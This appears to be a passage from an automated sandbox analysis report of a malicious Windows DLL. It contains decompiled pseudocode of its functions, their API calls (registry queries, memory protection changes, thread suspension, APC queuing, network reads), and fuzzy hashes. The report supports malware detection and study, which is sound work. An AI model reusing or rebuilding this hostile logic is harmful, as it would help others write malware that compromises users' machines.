                				_v16 = _t22;
                				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                					_t25 = E01C15AAB( &_v8,  &_v20); // executed
                					_t54 = _t25;
                					_t26 =  *0x1c1a2d8; // 0x55d5a8
                					if( *0x1c1a2b4 > 5) {
                						_t8 = _t26 + 0x1c1b5cd; // 0x4d283a53
                						_t27 = _t8;
                					} else {
                						_t7 = _t26 + 0x1c1b9f9; // 0x44283a44
                						_t27 = _t7;
                					}
                					E01C16CD7(_t27, _t27);
                					_t31 = E01C130FD(_t61,  &_v20,  &_v12); // executed
                					if(_t31 == 0) {
                						CloseHandle(_v20);
                					}
                					_t63 = 5;
                					if(_t54 != _t63) {
                						 *0x1c1a2c8 =  *0x1c1a2c8 ^ 0x81bbe65d;
                						_t32 = E01C12114(0x60);
                						__eflags = _t32;
                						 *0x1c1a384 = _t32;
                						if(_t32 == 0) {
                							_push(8);
                							_pop(0);
                						} else {
                							memset(_t32, 0, 0x60);
                							_t49 =  *0x1c1a384; // 0x21795b0
                							_t70 = _t70 + 0xc;
                							__imp__(_t49 + 0x40);
                							_t51 =  *0x1c1a384; // 0x21795b0
                							 *_t51 = 0x1c1b823;
                						}
                						__eflags = 0;
                						_t54 = 0;
                						if(0 == 0) {
                							_t36 = RtlAllocateHeap( *0x1c1a290, 0, 0x43);
                							__eflags = _t36;
                							 *0x1c1a320 = _t36;
                							if(_t36 == 0) {
                								_push(8);
                								_pop(0);
                							} else {
                								_t56 =  *0x1c1a2b4; // 0x2000000a
                								_t61 = _t56 & 0x000000ff;
                								_t58 =  *0x1c1a2d8; // 0x55d5a8
                								_t13 = _t58 + 0x1c1b55a; // 0x697a6f4d
                								_t55 = _t13;
                								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x1c192ab);
                							}
                							__eflags = 0;
                							_t54 = 0;
                							if(0 == 0) {
                								asm("sbb eax, eax");
                								E01C15F8B( ~_v8 &  *0x1c1a2c8, 0x1c1a010); // executed
                								_t42 = E01C14BB3(0, _t55, _t63, 0x1c1a010); // executed
                								_t54 = _t42;
                								__eflags = _t54;
                								if(_t54 != 0) {
                									goto L30;
                								}
                								_t43 = E01C133AC(); // executed
                								__eflags = _t43;
                								if(_t43 != 0) {
                									__eflags = _v8;
                									_t67 = _v12;
                									if(_v8 != 0) {
                										L29:
                										_t44 = E01C1541F(_t61, _t67, _v8); // executed
                										_t54 = _t44;
                										goto L30;
                									}
                									__eflags = _t67;
                									if(__eflags == 0) {
                										goto L30;
                									}
                									_t54 = E01C11E0F(__eflags,  &(_t67[4]));
                									__eflags = _t54;
                									if(_t54 == 0) {
                										goto L30;
                									}
                									goto L29;
                								}
                								_t54 = 8;
                							}
                						}
                					} else {
                						_t68 = _v12;
                						if(_t68 == 0) {
                							L30:
                							if(_v16 == 0 || _v16 == 1) {
                								 *0x1c1a14c(); // executed
                							}
                							goto L34;
                						}
                						_t69 =  &(_t68[4]);
                						do {
                						} while (E01C16096(_t63, _t69, 0, 1) == 0x4c7);
                					}
                					goto L30;
                				} else {
                					_t54 = _t22;
                					L34:
                					return _t54;
                				}
                			}

                APIs
                  • Part of subcall function 01C13B98: GetModuleHandleA.KERNEL32(4C44544E,00000000,01C134BA,00000001), ref: 01C13BA7
                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 01C13537
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • memset.NTDLL ref: 01C13587
                • RtlInitializeCriticalSection.NTDLL(02179570), ref: 01C13598
                  • Part of subcall function 01C11E0F: memset.NTDLL ref: 01C11E29
                  • Part of subcall function 01C11E0F: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 01C11E6F
                  • Part of subcall function 01C11E0F: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 01C11E7A
                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 01C135C3
                • wsprintfA.USER32 ref: 01C135F3
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                • String ID:
                • API String ID: 4246211962-0
                • Opcode ID: 69bb68600374839e1883afd582ab802ad5097c27cd45a15e2f3c5a3950f8635d
                • Instruction ID: a05fea86412ab8f773f7cd28f89cda7ac5c233436c97d9eb2d0fcd78982a5e96
                • Opcode Fuzzy Hash: 69bb68600374839e1883afd582ab802ad5097c27cd45a15e2f3c5a3950f8635d
                • Instruction Fuzzy Hash: 42510B71BC12A5EBDB21DBA8DC85F6D37B8BB17B28F100825E206D724DD7B4D640AB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E01C1284F(signed int __eax, signed int _a4, signed int _a8) {
                				signed int _v8;
                				signed int _v12;
                				intOrPtr _v16;
                				signed int _v20;
                				intOrPtr _t81;
                				char _t83;
                				signed int _t90;
                				signed int _t97;
                				signed int _t99;
                				char _t101;
                				unsigned int _t102;
                				intOrPtr _t103;
                				char* _t107;
                				signed int _t110;
                				signed int _t113;
                				signed int _t118;
                				signed int _t122;
                				intOrPtr _t124;
                
                				_t102 = _a8;
                				_t118 = 0;
                				_v20 = __eax;
                				_t122 = (_t102 >> 2) + 1;
                				_v8 = 0;
                				_a8 = 0;
                				_t81 = E01C12114(_t122 << 2);
                				_v16 = _t81;
                				if(_t81 == 0) {
                					_push(8);
                					_pop(0);
                					L37:
                					return 0;
                				}
                				_t107 = _a4;
                				_a4 = _t102;
                				_t113 = 0;
                				while(1) {
                					_t83 =  *_t107;
                					if(_t83 == 0) {
                						break;
                					}
                					if(_t83 == 0xd || _t83 == 0xa) {
                						if(_t118 != 0) {
                							if(_t118 > _v8) {
                								_v8 = _t118;
                							}
                							_a8 = _a8 + 1;
                							_t118 = 0;
                						}
                						 *_t107 = 0;
                						goto L16;
                					} else {
                						if(_t118 != 0) {
                							L10:
                							_t118 = _t118 + 1;
                							L16:
                							_t107 = _t107 + 1;
                							_t15 =  &_a4;
                							 *_t15 = _a4 - 1;
                							if( *_t15 != 0) {
                								continue;
                							}
                							break;
                						}
                						if(_t113 == _t122) {
                							L21:
                							if(_a8 <= 0x20) {
                								_push(0xb);
                								L34:
                								_pop(0);
                								L35:
                								E01C12C11(_v16);
                								goto L37;
                							}
                							_t24 = _v8 + 5; // 0xcdd8d2f8
                							_t103 = E01C12114((_v8 + _t24) * _a8 + 4);
                							if(_t103 == 0) {
                								_push(8);
                								goto L34;
                							}
                							_t90 = _a8;
                							_a4 = _a4 & 0x00000000;
                							_v8 = _v8 & 0x00000000;
                							_t124 = _t103 + _t90 * 4;
                							if(_t90 <= 0) {
                								L31:
                								 *0x1c1a2d0 = _t103;
                								goto L35;
                							}
                							do {
                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                								_v12 = _v12 & 0x00000000;
                								if(_a4 <= 0) {
                									goto L30;
                								} else {
                									goto L26;
                								}
                								while(1) {
                									L26:
                									_t99 = _v12;
                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                									if(_t99 == 0) {
                										break;
                									}
                									_v12 = _v12 + 1;
                									if(_v12 < _a4) {
                										continue;
                									}
                									goto L30;
                								}
                								_v8 = _v8 - 1;
                								L30:
                								_t97 = _a4;
                								_a4 = _a4 + 1;
                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                								__imp__(_t124);
                								_v8 = _v8 + 1;
                								_t124 = _t124 + _t97 + 1;
                							} while (_v8 < _a8);
                							goto L31;
                						}
                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                						_t101 = _t83;
                						if(_t83 - 0x61 <= 0x19) {
                							_t101 = _t101 - 0x20;
                						}
                						 *_t107 = _t101;
                						_t113 = _t113 + 1;
                						goto L10;
                					}
                				}
                				if(_t118 != 0) {
                					if(_t118 > _v8) {
                						_v8 = _t118;
                					}
                					_a8 = _a8 + 1;
                				}
                				goto L21;
                			}

                APIs
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 01C1294C
                • lstrcat.KERNEL32(69B25F45,00000020), ref: 01C12961
                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 01C12978
                • lstrlen.KERNEL32(69B25F45), ref: 01C1299C
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                • String ID:
                • API String ID: 3214092121-3916222277
                • Opcode ID: 803bdc3012622071cc27cef3f57af368c5d5a5d33b3dac701aff7a1bc9f79a7d
                • Instruction ID: b65beb8813de8e465ecee50882348333d7b99a8ee51c48bbc845b64c4c5209fa
                • Opcode Fuzzy Hash: 803bdc3012622071cc27cef3f57af368c5d5a5d33b3dac701aff7a1bc9f79a7d
                • Instruction Fuzzy Hash: BC51CF3AA80108EFEB21CF9DC4446ADBBB6FF56350F24805AE9459B209C730DB51EB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C157E8(signed int _a4, signed int* _a8) {
                				void* __ecx;
                				void* __edi;
                				signed int _t6;
                				intOrPtr _t8;
                				intOrPtr _t12;
                				long _t14;
                				void* _t18;
                				WCHAR* _t19;
                				long _t20;
                				void* _t25;
                				void* _t26;
                				signed int* _t28;
                				CHAR* _t30;
                				long _t31;
                				WCHAR** _t32;
                
                				_t6 =  *0x1c1a2c8; // 0xd448b889
                				_t32 = _a4;
                				_a4 = _t6 ^ 0x109a6410;
                				_t8 =  *0x1c1a2d8; // 0x55d5a8
                				_t3 = _t8 + 0x1c1b876; // 0x61636f4c
                				_t25 = 0;
                				_t30 = E01C13FEB(_t3, 1);
                				if(_t30 != 0) {
                					_t25 = CreateEventA(0x1c1a304, 1, 0, _t30);
                					E01C12C11(_t30);
                				}
                				_t12 =  *0x1c1a2b4; // 0x2000000a
                				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
                					L12:
                					_t28 = _a8;
                					if(_t28 != 0) {
                						 *_t28 =  *_t28 | 0x00000001;
                					}
                					_t14 = E01C11212(_t32, _t26); // executed
                					_t31 = _t14;
                					if(_t31 == 0 && _t25 != 0) {
                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                					}
                					if(_t28 != 0 && _t31 != 0) {
                						 *_t28 =  *_t28 & 0xfffffffe;
                					}
                					goto L20;
                				} else {
                					_t18 = E01C12130(); // executed
                					if(_t18 != 0) {
                						goto L12;
                					}
                					_t19 = StrChrW( *_t32, 0x20);
                					if(_t19 != 0) {
                						 *_t19 = 0;
                						_t19 =  &(_t19[1]);
                					}
                					_t20 = E01C16096(0,  *_t32, _t19, 0); // executed
                					_t31 = _t20;
                					if(_t31 == 0) {
                						if(_t25 == 0) {
                							L22:
                							return _t31;
                						}
                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                						if(_t31 == 0) {
                							L20:
                							if(_t25 != 0) {
                								CloseHandle(_t25);
                							}
                							goto L22;
                						}
                					}
                					goto L12;
                				}
                			}

                APIs
                  • Part of subcall function 01C13FEB: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,02179B30,00000000,?,?,69B25F44,00000005,01C1A010,4D283A53,?,?), ref: 01C14021
                  • Part of subcall function 01C13FEB: lstrcpy.KERNEL32(00000000,00000000), ref: 01C14045
                  • Part of subcall function 01C13FEB: lstrcat.KERNEL32(00000000,00000000), ref: 01C1404D
                • CreateEventA.KERNEL32(01C1A304,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,01C161CB,?,?,?), ref: 01C15829
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                • StrChrW.SHLWAPI(01C161CB,00000020,61636F4C,00000001,00000000,?,?,00000000,?,01C161CB,?,?,?), ref: 01C1585C
                • WaitForSingleObject.KERNEL32(00000000,00004E20,01C161CB,00000000,00000000,?,00000000,?,01C161CB,?,?,?), ref: 01C15887
                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,01C161CB,?,?,?), ref: 01C158B5
                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,01C161CB,?,?,?), ref: 01C158CD
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                • String ID:
                • API String ID: 73268831-0
                • Opcode ID: 33d58eabe9a1c7c44eaee6489de14dc88fb9d5280dcac66ec459db7b12b76872
                • Instruction ID: afe8322ac43db31ab9b9efd7c441bc424fe8eff69d9c4e42372e11646c4e38d1
                • Opcode Fuzzy Hash: 33d58eabe9a1c7c44eaee6489de14dc88fb9d5280dcac66ec459db7b12b76872
                • Instruction Fuzzy Hash: F32125329C1311EBF7315AAC9884BAB77A9FBDBA20B150225FE469714CDB71CA01A750
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046CD0E6: RegCreateKeyA.ADVAPI32(80000001,04C9B7F0,?), ref: 046CD0FB
                  • Part of subcall function 046CD0E6: lstrlen.KERNEL32(04C9B7F0,00000000,00000000,046ED06E,?,?,?,046C902F,00000001,?), ref: 046CD124
                • RegQueryValueExA.KERNELBASE(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,00000003,00000000,?,00000000,?,046DE5BD,046DE5BD,?,046D6019,00000000), ref: 046CBC69
                • RtlAllocateHeap.NTDLL(00000000,046D6019), ref: 046CBC7D
                • RegQueryValueExA.ADVAPI32(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046CBC97
                • HeapFree.KERNEL32(00000000,046D6019,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?,?,?,00000000,?,?), ref: 046CBCB3
                • RegCloseKey.ADVAPI32(?,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046CBCC1
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                • String ID:
                • API String ID: 1633053242-0
                • Opcode ID: 41b27e586e5a7220d49eeb516c3c563c2d41b1cb641889aea04d298992fb6c12
                • Instruction ID: 56d4f1cc300437dde402fda793c6e6702037271f5ad14fc396f6e007b1531027
                • Opcode Fuzzy Hash: 41b27e586e5a7220d49eeb516c3c563c2d41b1cb641889aea04d298992fb6c12
                • Instruction Fuzzy Hash: 411130B250010DFFDB019F95ED85CBE7BBEFB88654B10042AF91197210FB72AD559B60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 49%
                			E01C12F14(void* __ecx, void* __edi, intOrPtr _a4) {
                				unsigned int _v8;
                				void* _v12;
                				long _t15;
                				long _t16;
                				signed int _t18;
                				signed int _t19;
                				unsigned int _t21;
                				unsigned int _t26;
                
                				asm("stosd");
                				_v12 = _v12 | 0xffffffff;
                				while(1) {
                					_t15 = QueueUserAPC(E01C12702, GetCurrentThread(),  &_v12); // executed
                					if(_t15 == 0) {
                						break;
                					}
                					_t26 = _v8;
                					_t18 = (_t26 << 0x00000020 | _v12) >> 5;
                					_push(0);
                					_push(0x13);
                					_push(_t26 >> 5);
                					_push(_t18);
                					L01C181DA();
                					_push(1);
                					_t19 = 3;
                					_t21 = SleepEx(_t19 << (_t18 & 0x00000007), ??); // executed
                					_t16 = E01C16F25(_a4, (_t21 >> 6) + _t18);
                					if(_t16 == 1) {
                						continue;
                					} else {
                					}
                					L5:
                					return _t16;
                				}
                				_t16 = GetLastError();
                				goto L5;
                			}


                APIs
                • GetCurrentThread.KERNEL32 ref: 01C12F2A
                • QueueUserAPC.KERNELBASE(01C12702,00000000,?,?,?,01C16D70,?,?), ref: 01C12F36
                • _aullrem.NTDLL(000000FF,?,00000013,00000000), ref: 01C12F53
                • SleepEx.KERNELBASE(00000003,00000001,?,?,?,01C16D70,?,?), ref: 01C12F67
                  • Part of subcall function 01C16F25: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,00000000), ref: 01C16F84
                • GetLastError.KERNEL32(?,?,?,01C16D70,?,?), ref: 01C12F82
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: CurrentErrorLastQueueSleepThreadUser_aullremmemcpy
                • String ID:
                • API String ID: 2952296216-0
                • Opcode ID: 2c907d48f93258317095e09a7c81b0b90aa25834bd426a3c38d0ff7ec633260a
                • Instruction ID: 1116bb24f7c2cbfe486e1a53c256d536ba442583cca80aa5268d0f6f3295e348
                • Opcode Fuzzy Hash: 2c907d48f93258317095e09a7c81b0b90aa25834bd426a3c38d0ff7ec633260a
                • Instruction Fuzzy Hash: 9D0167B6A80214FBEB249AA5DC1EFEE7A7CE756710F100118F503D6184D6B0D741D761
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6), ref: 046D7279
                • GetLastError.KERNEL32(?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F), ref: 046D7281
                • VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F), ref: 046D7298
                • VirtualProtect.KERNEL32(?,00000000,-2C9B417C,00000004,?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7), ref: 046D72BD
                • SetLastError.KERNEL32(00000000,?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F), ref: 046D72C6
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Virtual$ErrorLastProtect$Query
                • String ID:
                • API String ID: 148356745-0
                • Opcode ID: af9ce6a6d5a52a517756a14bfc19e5867ad700c449fda97c764542f42f77a465
                • Instruction ID: dfa36bf0b317ce24806d57137eb39f3b12be813ff9f694c568361aa8db3549a6
                • Opcode Fuzzy Hash: af9ce6a6d5a52a517756a14bfc19e5867ad700c449fda97c764542f42f77a465
                • Instruction Fuzzy Hash: BE01257290020AEF9B11AF96DC44CEABBB9EB582517008426F901D7220E775EA149BA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C15CF6(void* __edx) {
                				void* _v8;
                				int _v12;
                				WCHAR* _v16;
                				void* __edi;
                				void* __esi;
                				void* _t23;
                				intOrPtr _t24;
                				void* _t26;
                				intOrPtr _t32;
                				intOrPtr _t35;
                				intOrPtr _t38;
                				intOrPtr _t42;
                				void* _t45;
                				void* _t50;
                				void* _t52;
                
                				_t50 = __edx;
                				_v12 = 0;
                				_t23 = E01C13B1B(0,  &_v8); // executed
                				if(_t23 != 0) {
                					_v8 = 0;
                				}
                				_t24 =  *0x1c1a2d8; // 0x55d5a8
                				_t4 = _t24 + 0x1c1be38; // 0x21793e0
                				_t5 = _t24 + 0x1c1bde0; // 0x4f0053
                				_t26 = E01C171E5( &_v16, _v8, _t5, _t4); // executed
                				_t45 = _t26;
                				if(_t45 == 0) {
                					StrToIntExW(_v16, 0,  &_v12);
                					_t45 = 8;
                					if(_v12 < _t45) {
                						_t45 = 1;
                						__eflags = 1;
                					} else {
                						_t32 =  *0x1c1a2d8; // 0x55d5a8
                						_t11 = _t32 + 0x1c1be2c; // 0x21793d4
                						_t48 = _t11;
                						_t12 = _t32 + 0x1c1bde0; // 0x4f0053
                						_t52 = E01C16C7B(_t11, _t12, _t11);
                						_t59 = _t52;
                						if(_t52 != 0) {
                							_t35 =  *0x1c1a2d8; // 0x55d5a8
                							_t13 = _t35 + 0x1c1be76; // 0x30314549
                							if(E01C136C5(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                								_t61 =  *0x1c1a2b4 - 6;
                								if( *0x1c1a2b4 <= 6) {
                									_t42 =  *0x1c1a2d8; // 0x55d5a8
                									_t15 = _t42 + 0x1c1bdc2; // 0x52384549
                									E01C136C5(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                								}
                							}
                							_t38 =  *0x1c1a2d8; // 0x55d5a8
                							_t17 = _t38 + 0x1c1be70; // 0x2179418
                							_t18 = _t38 + 0x1c1be48; // 0x680043
                							_t45 = E01C12BC9(_v8, 0x80000001, _t52, _t18, _t17);
                							HeapFree( *0x1c1a290, 0, _t52);
                						}
                					}
                					HeapFree( *0x1c1a290, 0, _v16);
                				}
                				_t54 = _v8;
                				if(_v8 != 0) {
                					E01C173B2(_t54);
                				}
                				return _t45;
                			}


                APIs
                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,021793E0,00000000,?,74E5F710,00000000,74E5F730), ref: 01C15D45
                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02179418,?,00000000,30314549,00000014,004F0053,021793D4), ref: 01C15DE2
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01C154C0), ref: 01C15DF4
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID: Ut
                • API String ID: 3298025750-8415677
                • Opcode ID: a773dae8cbc81837727b0acc54b48e9f23ebf3c3c08b432ef5eb1785c633e782
                • Instruction ID: d010f7dddb6417d4b3637eebff4951862e289a6559907fbf0666ec5e12b2e945
                • Opcode Fuzzy Hash: a773dae8cbc81837727b0acc54b48e9f23ebf3c3c08b432ef5eb1785c633e782
                • Instruction Fuzzy Hash: C831CF31A80159EFDB21EFA4DD88FDA7BB8FB4B700F140055E60997129DB71DA08EB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 046DB0B2
                • ResumeThread.KERNELBASE(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 046DB13C
                • WaitForSingleObject.KERNEL32(00000064), ref: 046DB14A
                • SuspendThread.KERNELBASE(?), ref: 046DB15D
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                • String ID:
                • API String ID: 3168247402-0
                • Opcode ID: 55903e9fdb585463173161cf820b691265bd861509bda58fa957d84eba61964f
                • Instruction ID: 73ed20f9f84827d8886854fabba92b823385db84debcde82c0ab70b7d412ec0a
                • Opcode Fuzzy Hash: 55903e9fdb585463173161cf820b691265bd861509bda58fa957d84eba61964f
                • Instruction Fuzzy Hash: 4F415871104301AFE721EF54CC80E7BBBE9EF98754F00492DFA95922A4E731F9588B66
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E01C12711(void* __eax) {
                				long _v8;
                				char _v12;
                				char _v16;
                				intOrPtr _v20;
                				void* _v24;
                				void* __esi;
                				char* _t40;
                				long _t41;
                				void* _t44;
                				intOrPtr _t45;
                				intOrPtr* _t46;
                				char _t48;
                				long _t52;
                				char* _t53;
                				long _t54;
                				intOrPtr* _t55;
                				void* _t64;
                
                				_t64 = __eax;
                				_t40 =  &_v12;
                				_v8 = 0;
                				_v16 = 0;
                				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40); // executed
                				if(_t40 == 0) {
                					_t41 = GetLastError();
                					_v8 = _t41;
                					if(_t41 != 0x2efe) {
                						L26:
                						return _v8;
                					}
                					_v8 = 0;
                					L25:
                					 *((intOrPtr*)(_t64 + 0x30)) = 0;
                					goto L26;
                				}
                				if(_v12 == 0) {
                					goto L25;
                				}
                				_t44 =  *0x1c1a144(0, 1,  &_v24); // executed
                				if(_t44 != 0) {
                					_v8 = 8;
                					goto L26;
                				}
                				_t45 = E01C12114(0x1000);
                				_v20 = _t45;
                				if(_t45 == 0) {
                					_v8 = 8;
                					L21:
                					_t46 = _v24;
                					 *((intOrPtr*)( *_t46 + 8))(_t46);
                					goto L26;
                				} else {
                					goto L4;
                				}
                				do {
                					while(1) {
                						L4:
                						_t48 = _v12;
                						if(_t48 >= 0x1000) {
                							_t48 = 0x1000;
                						}
                						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
                						if(_t48 == 0) {
                							break;
                						}
                						_t55 = _v24;
                						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
                						_t17 =  &_v12;
                						 *_t17 = _v12 - _v16;
                						if( *_t17 != 0) {
                							continue;
                						}
                						L10:
                						if(WaitForSingleObject( *0x1c1a2c4, 0) != 0x102) {
                							_v8 = 0x102;
                							L18:
                							E01C12C11(_v20);
                							if(_v8 == 0) {
                								_t52 = E01C14E7A(_v24, _t64); // executed
                								_v8 = _t52;
                							}
                							goto L21;
                						}
                						_t53 =  &_v12;
                						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53); // executed
                						if(_t53 != 0) {
                							goto L15;
                						}
                						_t54 = GetLastError();
                						_v8 = _t54;
                						if(_t54 != 0x2f78 || _v12 != 0) {
                							goto L18;
                						} else {
                							_v8 = 0;
                							goto L15;
                						}
                					}
                					_v8 = GetLastError();
                					goto L10;
                					L15:
                				} while (_v12 != 0);
                				goto L18;
                			}


                APIs
                • GetLastError.KERNEL32 ref: 01C12831
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • GetLastError.KERNEL32 ref: 01C127A5
                • WaitForSingleObject.KERNEL32(00000000), ref: 01C127B5
                • GetLastError.KERNEL32 ref: 01C127D5
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
